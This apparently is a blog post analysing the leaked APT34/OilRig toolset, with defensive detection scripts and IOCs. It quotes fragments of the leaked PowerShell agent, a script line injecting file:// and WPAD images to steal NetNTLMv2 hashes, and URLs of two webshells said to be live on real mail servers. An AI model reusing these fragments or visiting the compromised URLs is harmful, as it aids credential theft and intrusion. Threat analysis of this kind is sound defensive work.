APT34 / OILRIG Leak, Quick Analysis

A few weeks ago a group of Iranian hackers called "Lab Dookhtegan" started leaking information about the operations of APT34 / OILRIG, which is supposedly the Iranian Ministry of Intelligence. The leaks started on March 26, when Dookhtegan began dropping archives containing source code on Telegram. The initial leak has received little coverage so far, and the Telegram group where the leak first appeared only has about 30 members. It is unclear who the leaker(s) is/are.
This article is a quick overview of the leak and contains some IOCs.
Pieces of code presented in this article are available on my GitHub page.

Please take the information in this blog post with a grain of salt. I'm analyzing the content of the leaked material, not doing attribution. This could as well be a disinformation campaign and not APT34 at all.

The first leak is dubbed "Poison Frog" and contains two parts:
  • A server-side module, which is the C2, written in node.js
  • An agent part, which is the payload, written in PowerShell.
The agent part contains 2 big chunks of base64 which are loaded with PowerShell. To me this looks like a first-stage payload. It fetches a configuration file from myleftheart.com (which is down now), creates a bunch of folders in C:\Users\Public\Public and also drops the two other payloads there. It also creates 2 scheduled tasks, one running as administrator and one as a normal user; these tasks run the two dropped PowerShell scripts, dUpdater.ps1 and hUpdater.ps1, every 10 minutes.
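A host check for the artifacts this stage leaves behind (the drop directory, the two updater scripts, the VBS file and the per-victim folder name from the IOC section, plus scheduled tasks that run those scripts), as an added example that is not from the post or the leaked code. The task names and command lines in the sample schtasks output are constructed; the post does not give the real task names.

```python
import csv
import io
import os
import re
import subprocess
from pathlib import PureWindowsPath

# Host artifacts named in the post's IOC section (file names compared case-insensitively).
DROP_DIR = PureWindowsPath(r"C:\Users\Public\Public")
DROPPED_FILES = {"dupdater.ps1", "hupdater.ps1", "updatetask.vbs"}
VICTIM_FOLDER_RE = re.compile(r"^atag[0-9]{4}[A-Z]{2}$")


def suspicious_paths(paths):
    """Return the entries directly under the drop directory whose name is one of the
    dropped scripts or matches the per-victim folder pattern."""
    hits = []
    for p in paths:
        wp = PureWindowsPath(p)
        if wp.parent != DROP_DIR:          # PureWindowsPath compares case-insensitively
            continue
        if wp.name.lower() in DROPPED_FILES or VICTIM_FOLDER_RE.match(wp.name):
            hits.append(str(wp))
    return hits


def suspicious_tasks(schtasks_csv):
    """Parse `schtasks /query /fo csv /v` output and return (task name, run-as user)
    for every task whose action references one of the dropped scripts."""
    hits = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        action = (row.get("Task To Run") or "").lower()
        if any(name in action for name in DROPPED_FILES):
            hits.append((row["TaskName"], row.get("Run As User", "")))
    return hits


def hunt_local_host():
    """Run both checks on the current Windows host (needs schtasks.exe on PATH)."""
    paths = []
    if os.path.isdir(str(DROP_DIR)):
        paths = [str(DROP_DIR / name) for name in os.listdir(str(DROP_DIR))]
    out = subprocess.run(["schtasks", "/query", "/fo", "csv", "/v"],
                         capture_output=True, text=True).stdout
    return suspicious_paths(paths), suspicious_tasks(out)


# Constructed sample output (only the columns used here; real output has many more).
SAMPLE_SCHTASKS = r'''"HostName","TaskName","Task To Run","Run As User"
"WKS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM"
"WKS01","\hUpdater","powershell.exe -f C:\Users\Public\Public\hUpdater.ps1","Administrator"
"WKS01","\dUpdater","powershell.exe -f C:\Users\Public\Public\dUpdater.ps1","WKS01\alice"
'''

if __name__ == "__main__":
    print(suspicious_tasks(SAMPLE_SCHTASKS))
```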




From these 2 payloads it's clear to see that it can receive and send files. It seems the actor was also using a proxy:

 $u = "http://" + $HHA + ":" + $KKA;
 $MMA = new-object System.Net.WebProxy($u, $true);
 $NNA = new-object System.Net.NetworkCredential($IIA, $JJA, $LLA)
 $MMA.credentials = $NNA

This function returns a subdomain for the myleftheart.com domain:

$CCA = "myleftheart.com";
$DDA = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID | %{ "atag12" + $_.replace('-','') }| %{$_ + "1234567890"} | %{$_.substring(0,10)}

function EEA ($FFA, $GGA, $HHA, $IIA, $JJA)
{
 $KKA = -join ((48 .. 57)+(65 .. 70) | Get-Random  -Count (%{ Get-Random -InputObject (1 .. 7) }) | %{ [char]$_ });
 $LLA = Get-Random -InputObject (0 .. 9) -Count 2;
 $MMA = $DDA.Insert(($LLA[1]), $GGA).Insert($LLA[0], $FFA);
 write-host $DDA;
 if ($JJA -eq "s")

 { Print "$($MMA)$($KKA)A$($LLA[0])$($LLA[1])7.$HHA.$IIA.$CCA";}
 else 
 { Print "$($MMA)$($KKA)A$($LLA[0])$($LLA[1])7.$($CCA)";}
}


The result is "atag1273EC", of which the last part is random; it is later appended to myleftheart.com and is also the name of the folder created on the victim's machine.
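A DNS-log check derived from the EEA function above, as an added example that is not from the post or the leak: the generated label ends with 1-7 uppercase hex characters, an "A", two distinct digits and a literal "7", followed by the C2 domain (optionally with the two extra labels). The log lines and client IPs are constructed.

```python
import re

C2_DOMAIN = "myleftheart.com"
# Shape of the first label built by EEA: the machine tag with the two argument strings
# inserted (anything), then 1-7 uppercase hex chars, 'A', two distinct digits and '7'.
LABEL_RE = re.compile(r"^(?P<tag>.*?)(?P<rnd>[0-9A-F]{1,7})A(?P<i>\d)(?P<j>\d)7$")


def classify_qname(qname):
    """None if unrelated to the C2 domain; 'domain' if it is merely under
    myleftheart.com; 'beacon' if the first label also fits the generator."""
    name = qname.rstrip(".").lower()
    if name == C2_DOMAIN:
        return "domain"
    if not name.endswith("." + C2_DOMAIN):
        return None
    first_label = name[: -len(C2_DOMAIN) - 1].split(".")[0]
    m = LABEL_RE.match(first_label.upper())
    if m and m.group("i") != m.group("j"):
        return "beacon"
    return "domain"


def scan_dns_log(lines):
    """Scan 'timestamp client qname' lines; return (client, qname, verdict) for hits."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        verdict = classify_qname(parts[2])
        if verdict:
            hits.append((parts[1], parts[2], verdict))
    return hits


# Constructed log lines, not taken from the leak.
SAMPLE_LOG = [
    "2019-04-18T10:00:01Z 10.0.0.15 www.example.com",
    "2019-04-18T10:00:07Z 10.0.0.15 atag1273EC3FA057.myleftheart.com",
    "2019-04-18T10:10:07Z 10.0.0.15 atag1273EC9A3A127.s1.x2.myleftheart.com",
    "2019-04-18T10:11:00Z 10.0.0.22 myleftheart.com",
]

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_LOG):
        print(hit)
```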

Note that these samples were first seen on VirusTotal today, after I uploaded them, and only 2 antivirus engines detected them as malicious:




Unfortunately the server part is missing CSS files and other important files, so it's not possible to run it properly as is. But opening the raw panel file gives an idea of its capabilities:


On to the next one...
A big part of the leak is a rather large number of ASP webshells, dubbed "HighShell" and "HyperShell"; quite a few variants of these are included.
HyperShell is more than 30k lines of code... In order to see the shell you need to have a cookie named "p" with the right password. Unfortunately the leaker has stripped all of the most meaningful passwords and replaced them with "Th!sN0tF0rFAN".

As you can see on the screenshot below, the cookie is compared to the string "pp", which is the result of base64(sha256(Bytes(cookie+salt))).




At the time of writing this article it seems that 2 ASP webshells are still online:
hxxps://webmail.sstc.com.sa/owa/auth/logout.aspx
hxxps://mail.adac.ae/owa/auth/RedirOutlookService.aspx/

Another dirty one is called "dnspionage". It comes with a guide and an install script to help the operator. It is separated in 2 parts:

icap.py, which is an ICAP server that seems to be able to receive all kinds of data, like credentials, cookies...
What makes me curious is this line:

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

I think [ip] has to be replaced by the attacker's IP; when this is injected into a victim's browser as an image, it will make Windows connect to file://ip and the attacker will be able to steal NetNTLMv2 hashes.

"TL;DR: Every NT-based operating system comes with a near-ideal LLMNR/NBT-NS poisoning setup baked in, unless an administrator configures WPAD using step 1 or 2. An attacker who responds to the multicast/broadcast request will be able to force the client to authenticate to the attacker’s machine using NTLM, and execute a MitM attack."

Moreover, assuming the attacker has gained control of the proxy, he could make his server answer DNS A requests for WPAD, then make his server answer GET requests with an image that is actually a PAC file.

Fun fact: this server answers with a header that has a time delta of 3000 days, meaning the response will basically be cached by your browser and stay there for years if you don't clean your cache...
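Two proxy-side checks for what the two paragraphs above describe, as an added example that is not from the post or the leaked tooling: a scan of passing bodies for the injected file:// and http://WPAD/ image fetches, and a check for responses whose cache lifetime is absurdly long (the ~3000-day expiry). The sample body is the post's script line with [ip] set to a documentation address, and the header set is constructed.

```python
import re
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# Markers of the injection shown above: an <img> whose src is a file:// UNC path
# (which makes Windows authenticate to that host) and an image fetched from http://WPAD/.
FILE_IMG_RE = re.compile(r"<img[^>]*\ssrc\s*=\s*['\"]file://([^/'\"]+)", re.I)
WPAD_IMG_RE = re.compile(r"<img[^>]*\ssrc\s*=\s*['\"]https?://(wpad(?:\.[^/'\"]*)?)/", re.I)


def scan_body(body):
    """Return (kind, host) findings for injected file:// and WPAD image fetches in
    an HTML or script body passing through the proxy."""
    findings = [("file-uri-image", m.group(1)) for m in FILE_IMG_RE.finditer(body)]
    findings += [("wpad-image", m.group(1)) for m in WPAD_IMG_RE.finditer(body)]
    return findings


def cache_lifetime(headers, now):
    """Lifetime a client would cache the response for, from Cache-Control max-age
    (preferred) or Expires; None if neither is present or parseable."""
    h = {k.lower(): v for k, v in headers.items()}
    m = re.search(r"max-age=(\d+)", h.get("cache-control", ""))
    if m:
        return timedelta(seconds=int(m.group(1)))
    if "expires" in h:
        try:
            return parsedate_to_datetime(h["expires"]) - now
        except (TypeError, ValueError):   # naive/aware mismatch or unparseable date
            return None
    return None


def excessive_cache(headers, now, limit=timedelta(days=30)):
    """True when the response would outlive `limit` in a cache; the ~3000-day
    lifetime described above far exceeds any sane value for a PAC file or avatar."""
    life = cache_lifetime(headers, now)
    return life is not None and life > limit


# Constructed sample: the injected script from the post with [ip] replaced by a
# documentation address, plus a header set mimicking the multi-year expiry.
SAMPLE_BODY = (";$(document).ready(function(){$('<img src=\"file://203.0.113.5/resource/logo.jpg\">"
               "<img src=\"http://WPAD/avatar.jpg\">');});")
NOW = datetime(2019, 4, 18, tzinfo=timezone.utc)
SAMPLE_HEADERS = {"Content-Type": "image/jpeg", "Expires": "Sat, 03 Jul 2027 00:00:00 GMT"}

if __name__ == "__main__":
    print(scan_body(SAMPLE_BODY), excessive_cache(SAMPLE_HEADERS, NOW))
```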


The second part is dns.py, which also has a JavaScript version, dnsd.js.
It seems to be a DNS hijacker, which is not surprising as APT34 is known for DNS hijacking attacks. It runs on UDP port 53 and when it receives a request it checks whether the domain is in its config file and "overrides" the response with whatever IP the attacker has set. So basically this gives the attacker the ability to send victims who are using that DNS server to his own malicious server.

The other files in this leak contain a lot of private keys and credentials from users, but also DA (Domain Admin) credentials for a number of domains.


On a funnier note, it seems that some of the targets that the group breached were not big fans of password policies:


Note that the leak contains 2 additional folders dubbed "MinionProject" and "FoxPanel222". They again seem to be client/server applications. They both contain a panel and binaries, but I haven't analyzed them yet.
The leaker also provided other panel screenshots (which seem to be from yet another panel):




Voilà, that was definitely not a full analysis, but I just wanted to write something quick; it's also my first blog post here, so be indulgent (:

BTW, Florian, who writes YARA rules faster than his shadow, already wrote one if you need it:

IOC:

© Poison frog Changed by Poison Frogs Team
myleftheart.com
C:\Users\Public\Public\atag[0-9]{4}[A-Z]{2}
C:\Users\Public\Public\dUpdater.ps1
C:\Users\Public\Public\hUpdated.ps1
C:\Users\Public\Public\UpdateTask.vbs

Shells:
